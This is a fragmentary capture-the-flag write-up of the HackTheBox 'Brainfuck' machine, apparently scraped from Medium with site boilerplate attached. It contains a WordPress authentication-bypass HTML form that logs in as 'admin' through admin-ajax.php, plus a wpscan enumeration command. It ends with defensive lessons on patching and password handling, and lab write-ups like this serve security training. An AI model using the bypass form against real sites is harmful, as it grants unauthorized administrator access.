HackTheBox: Brainfuck Write-up #2

Reconnaissance

Enumeration

<form method="post" action="http://example.com/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
sudo wpscan — url https://www.brainfuck.htb — disable-tls-checks — enumerate

Exploitation

IMAP Ports must be as per our nmap scan results
SMTP ports also has to be the same as from our nmap scans
P.S: it took me the whole day to get it :)
Private key content
Finally we are in the Goddamn box,
Finally we’re done
  1. WordPress had its vulnerability due to non-compliance of using the updated product which has been patched against many common vulnerabilities that has been found.
  2. The email credentials saved inside the hosted facing the internet ,
  3. Sharing of of passwords(fixed, just in case they could be expiring ones) through emails as plaintext.

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Hack The Box: Lame Write-up

InfoSecSherpa’s News Roundup for Friday, January 21, 2022

Image by Yuri_B from Pixabay

{UPDATE} Pandamonium: Match 3 Games Hack Free Resources Generator

Best Way to Report Google Fraud to Google

Safeheron: BXH Incurred $130 Million Loss from Hacking

What? Why? How? SSL/TLS

How AML Regulation is Assisting Businesses in their Compliance Programs?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ruG3ma

ruG3ma

More from Medium

Measure EC2 performance

Configure SSH service with basic security configuration and MotD message.

portworx install on-premisses kubernetes

Embedded Systems Project 5: Output Display